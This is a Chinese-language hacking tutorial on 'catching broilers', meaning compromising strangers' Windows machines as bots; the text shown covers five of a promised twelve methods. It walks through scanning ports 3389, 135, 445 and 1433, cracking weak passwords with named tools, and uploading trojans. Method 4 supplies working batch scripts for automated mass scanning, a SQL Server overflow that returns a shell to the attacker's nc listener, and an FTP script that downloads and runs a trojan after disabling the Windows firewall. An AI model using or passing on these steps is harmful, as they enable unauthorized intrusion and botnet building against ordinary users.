最快最有效的12种抓鸡方法思

（1）扫3389端口抓肉鸡（适合新手）（抓不了国外肉鸡）

现在国内网络上流传着一种克隆版的XP，安装后会默认开启一个账号为new,密码为空的账户，而且基本上都是开着3389的，我们就可以利用这一点来抓肉鸡，

高手教你最简单的抓鸡办法

（2）扫135端口抓肉鸡

首先先用端口扫描器扫一段IP的135端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了，只能扫本地的135肉鸡，要抓外地的只能用外地的135肉鸡来扫。（详细动画可以去 网站搜索135）

（3）扫445端口抓肉鸡

和扫135抓肉鸡差不多，首先先用端口扫描器扫一段IP的445端口，然后把结果保存，再用NTSCAN过滤有弱口令的机器，最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了，只能扫本地的445肉鸡，要抓外地的只能用外地的445肉鸡来扫。（详细动画可以去 网站搜索445）

（4）1433端口批量溢出抓肉鸡

这个方法可以实现全自动抓鸡，不过现在太多人搞，成功率已经不高了。

要用到的工具：S扫sqlhello.exenc.exe批处理文件

首先先写个批处理，打开记事本，把以下代码复制修改后，储存为扫描+溢出.bat文件

@echo off

for /f "eol=; tokens=1,2 delims= " %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save

@echo off

for /f "eol=; tokens=1 delims= " %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556

还要新建一个tt.txt，里面你要扫的IP段，格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格

1433是要扫描的端口，1000是扫描线程数 ，do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP，556是后面NC监听的端口

然后再写个批处理

@echo off

Nc -l -vv -p 556

然后再新建一个nc.txt,里面填写溢出成功后让肉鸡下载你木马的代码，

电脑资料

这里给出一种代码

echo open X.X.X.X(你FTP的IP)>>daima.txt

echo username>>daima.txt

echo password>>daima.txt

echo bin>>daima.txt(以2进制传输数据)

echo get xxx.exe(你的木马的文件名,要放在根目录下)>>daima.txt

echo bye>>daima.txt

net stop sharedaccess(关闭WINDOWS自带防火墙)

ftp -s:daima.txt

xxx.exe(也是填你木马的文件名)

del daima.txt

注意上面的代码回车符别删掉，要不然就没法下你的马了。

更多的代码去http://publish.it168.com/2005/0731/20050731019501.shtml这里看

上面的步骤都搞好后，就可以开始扫肉鸡了。

先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以去睡大觉了。自动扫描，扫描完后自动溢出，溢出后还自动下马执行，爽吧！所以这里讲详细点，呵呵。还有42 21端口也可以这样溢出，只要用这些端口的溢出工具就好了，详细动画可以去 网站搜索1433。

忘了说，上面的工具和批处理什么的都要放在同一个文件夹下。

先休息一下，打这么多字累死了

继续

（5）扫1433抓肉鸡之方法2

要用到的工具：端口扫描器X-scanSQL综合利用工具

上面我们说过了，1433溢出现在成功率已经不高了，所以我们可以用另一种方法。

开了1433端口的机器一般都装了SQL，所以我们可以猜测SQL弱口令来抓1433肉鸡。

首先先用端口扫描器扫一段IP的1433端口，然后结果保存为文本文件，接着用X-scan导入这些开了1433的IP，然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了，其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏，只填1433端口。然后就可以开始扫描了。扫描完成后会有个报告，列出了有弱口令的机器，然后打开SQL综合利用工具，输入你扫到的弱口令来连接，接着打开SQL综合利用工具-利用目录，上传你的木马，然后在用DOS命令执行你的木马就OK了。